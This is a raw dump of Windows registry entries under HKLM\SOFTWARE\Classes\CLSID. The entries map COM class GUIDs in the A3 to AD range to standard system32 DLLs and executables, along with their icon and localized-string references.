%SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A38E6420-19EC-490c-B4BF-51673C360213}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A38F4597-F640-4189-982F-132ECF8202FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\PortableDeviceSyncProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\actioncenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A3BC03A0-041D-42E3-AD22-882B7865C9C5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a3c3d402-e56c-4033-95f7-4885e80b0111}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A3C97737-76D9-4f5f-B917-4DE47FE023C8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A3E41207-BE04-492A-AFF0-19E880FF7545}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipcima.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4173A49-F373-4475-9A0F-2D615204DC20}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a41a4187-5a86-4e26-b40a-856f9035d9cb}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a42c2ccb-67d3-46fa-abe6-7d2f3488c7a3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A43139B3-BDF5-4497-9DCF-6C7AADC1A5D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\musdialoghandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A43C525D-EDF0-48d9-B7FB-9BABBD6DBD65}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A470F8CF-A1E8-4f65-8335-227475AA5C46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a47401f6-a8a6-40ea-9c29-b8f6026c98b8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\srwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4B07E49-6567-4FB8-8D39-01920E3B2357} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\FirewallControlPanel.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4B07E49-6567-4FB8-8D39-01920E3B2357}\Elevation IconReference REG_EXPAND_SZ @%Systemroot%\System32\FirewallControlPanel.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4B07E49-6567-4FB8-8D39-01920E3B2357}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4B544A1-438D-4B41-9325-869523E2D6C7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a4c31131-ff70-4984-afd6-0609ced53ad6} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-28816 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a4c31131-ff70-4984-afd6-0609ced53ad6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4DDCA2B-E73C-40C5-83B1-9F40269D0B0D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4F2A5C9-979A-4EC6-851F-341F15D3F67D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5065670-136D-4FD6-A45F-00C85B90359C} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\DeviceSetupManagerAPI.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5065670-136D-4FD6-A45F-00C85B90359C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a5183349-82de-4bfc-9c13-7d9dc578729c}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a542e116-8088-4146-a352-b0d06e7f6af6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A55803CC-4D53-404c-8557-FD63DBA95D24}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WPDShextAutoplay.exe ServerExecutable REG_EXPAND_SZ %SystemRoot%\system32\WPDShextAutoplay.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A56A841F-E974-45C1-8001-7E3F8A085917}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a587dd8b-466f-4b66-a8d2-dc47272bebcb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5890610-900C-4115-BAFF-767E05E10F1F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a5a3563a-5755-4a6f-854e-afa3230b199f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5EAE54D-9886-4B8D-AA78-EAFF38D011CA} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\usercpl.dll,-230 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5EAE54D-9886-4B8D-AA78-EAFF38D011CA}\Elevation IconReference REG_EXPAND_SZ @%Systemroot%\System32\usercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5EAE54D-9886-4B8D-AA78-EAFF38D011CA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5EBA07A-DAE8-4d15-B12F-728EFD8A9866}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssprxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5EFE073-B16F-474f-9F3E-9F8B497A3E08}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5F89494-76C3-4A05-8BB4-8EA500A3208A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A608A731-B6F2-4d08-AC1E-C22A65B64ACF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A61DDE94-66CE-4AC1-881B-71680588895E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A63E13D5-5263-44A6-8A18-381EB6F181A2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6439333-78D2-4FFD-A20D-53B0EDC704BA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a6482830-08eb-41e2-84c1-73920c2badb9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a671c915-d95d-4135-b2c3-089356ca694f}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\nlahc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a677570a-2ba2-4e9a-b2e2-8a02cd8b4fd3}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PrintIsolationHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\MaintenanceUI.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6EE35C6-87EC-47DF-9F22-1D5AAD840C82}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a76de978-f3eb-4a4f-9f99-304ad619e2ab}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A79020BC-1F7E-4D20-AC2A-51D73012DDD5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\fveui.dll,-843 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\fveui.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fveui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7AA4814-7479-4047-BC99-32E757C8B850}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fhsrchapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7B9649E-FECE-4AE3-958C-C36B133E937F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a7ec30bd-4c22-4ca7-85dd-a7267dee78a4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A82E50BA-8E92-41eb-9DF2-433F50EC2993}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A83EF168-CA8D-11D2-B33D-00104BCC4B4A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8616FB9-1D84-4F32-B46B-5D7B80214B8A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a86ca2f1-af74-4a74-980b-e185d4ca01b0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A879E3C4-AF77-44fb-8F37-EBD1487CF920}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a893aa73-054f-4dbc-9e53-f4ee5fe07fd3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A894CA92-2E31-4AF2-BC7E-41079A8E5BE9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A896FD50-87BE-449A-9149-D10BA1FAAEE2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8A91A66-3A7D-4424-8D24-04E180695C7A} InfoTip REG_EXPAND_SZ @%systemroot%\system32\DeviceCenter.dll,-2000#immutable1 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\DeviceCenter.dll,-1000#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8A91A66-3A7D-4424-8D24-04E180695C7A}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceCenter.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8A91A66-3A7D-4424-8D24-04E180695C7A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8C680EB-3D32-11D2-9EE7-00C04F797396}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-112 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A8E64375-B645-4314-9EFC-C085981786FA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A907657F-6FDF-11D0-8EFB-00C04FD912B2}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tcpipcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A910187F-0C7A-45AC-92CC-59EDAFB77B53}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A919EA73-490E-4D5C-9BA7-97CBC73119FE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A91DEAA6-9773-42B7-86A4-5AD24CFF440A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\witnesswmiv2provider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9224722-48E4-4A66-8068-F90FA13A6D74}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A961F842-FC8E-4D53-8074-4AB67E8854B4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9710FB5-1840-4224-BD42-86831E28E43A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\modemui.dll,-20101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9710FB5-1840-4224-BD42-86831E28E43A}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\mdminst.dll,-5100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9710FB5-1840-4224-BD42-86831E28E43A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UICOM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A973E7B2-131B-428E-8B2B-EAE73D731E98}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ActionCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9927F85-A304-4390-8B23-A75F1C668600}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MicrosoftAccountTokenProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9A33436-678B-4c9c-A211-7CC38785E79D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a9ae6c91-1d1b-11d2-b21a-00c04fa357fa}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msident.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9B005E5-AB63-4C1D-AE9E-AA120A50BB0F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LockScreenContent.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9B48EAC-3ED8-11d2-8216-00C04FB687DA}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL,-2000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9B48EAC-3ED8-11d2-8216-00C04FB687DA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9CF0EAE-901A-4739-A481-E35B73E47F6D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{a9d7038d-b5ed-472e-9c47-94bea90a5910}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A9F738C8-6B96-41FA-A155-15ECD67275D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA04CA0B-7597-4F3E-99A8-36712D13D676}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA0EB6FC-A8EB-4FD9-A861-0014B374076E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{aa1b0e54-7593-40a0-8135-ed0b6cbc0154}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{aa28fbc7-59f1-4c42-9fd8-ba2be27ea319}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA2E2C5B-0B0C-4ECC-B32B-3935269E0588}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA453FDC-5D6C-4C33-AD14-67680BF6F1DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{aa509086-5ca9-4c25-8f95-589d3c07b48a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA527A40-4D9A-11D2-93AD-00805F853771}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\dsprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA558FA2-A340-4a23-B765-614BA827CE1D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppinst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\domgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA67AF38-4AE0-4B49-BA56-ADF78DBED45A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA70DDF4-E11C-11D1-ABB0-00C04FD9159E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\viewprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{aa7313a4-03d8-44bb-b60d-0dcb7bdabf8c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA7E3C50-864C-4604-BC04-8B0B76E637F6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AA94DCC2-B8B0-4898-B835-000AABD74393}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AAA288BA-9A4C-45B0-95D7-94D524869DB5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpdshserviceobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AAB9C730-3C6C-4faa-A87E-77198D9E2A57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AABE54D4-6E88-4c46-A6B3-1DF790DD6E0D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AABFB2FA-3E1E-4A8f-8977-5556FB94EA23}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{aac1009f-ab33-48f9-9a21-7f5b88426a2e}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\TSTheme.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AAEAE72F-0328-4763-8ECB-23422EDE2DB5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\policman.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ab0b37ec-56f6-4a0e-a8fd-7a8bf7c2da96}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB1890A0-E91F-11D2-BB91-00C04F8EE6C0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB2A519B-03B0-43CE-940A-A73DF850B49A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\StorageUsage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB300F71-01AB-46D2-AB6C-64906CB03258}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB40A5C1-804B-40BD-9DFE-A640691C6956}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\\WMIPJOBJ.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB517586-73CF-489c-8D8C-5AE0EAD0613A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB824EEF-7CF4-4c55-B415-B2D9CD30FE9E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\prauthproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB93B6F1-BE76-4185-A488-A9001B105B94}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BdeUISrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB944620-79C6-11D1-88F9-0080C7D771BF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ABBB0332-21FC-4F9A-BBF0-C329B38611D9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ABCA6774-29B5-4aff-A776-C2551AE0FFE6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.ui.immersive.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{abd2ad24-f1ff-47ad-82de-3a1edf38e7a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ABDBD0B1-7D54-49fb-AB5C-BFF4130004CD}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AC3AC249-E820-4343-A65B-377AC634DC09}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BioCredProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AC4CE3CB-E1C1-44CD-8215-5A1665509EC2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wmphoto.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AC75D454-9F37-48f8-B972-4E19BC856011}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ACA965C4-D406-4531-B6D9-C099D5D8EDEA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ace575fd-1fcf-4074-9401-ebab990fa9de}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AD1841CF-0EC5-4b59-ACC4-8329EED299F9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndfhcdiscovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AD7572AD-86A5-4211-BC54-A438E550A740}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ad974ae2-e292-4083-a280-0342d68daf55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ADAB9B51-4CDD-4af0-892C-AB7FA7B3293F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\gpsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ADB9F5A4-E73E-49b8-99B6-2FA317EF9DBC}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ADB9F5A4-E73E-49b8-99B6-2FA317EF9DBC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ADBDEF00-9A50-4DC6-B945-CB95B4233E3C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{add36aa8-751a-4579-a266-d66f5202ccbb}\InProcServer32 (Default) REG_EXPAND_SZ 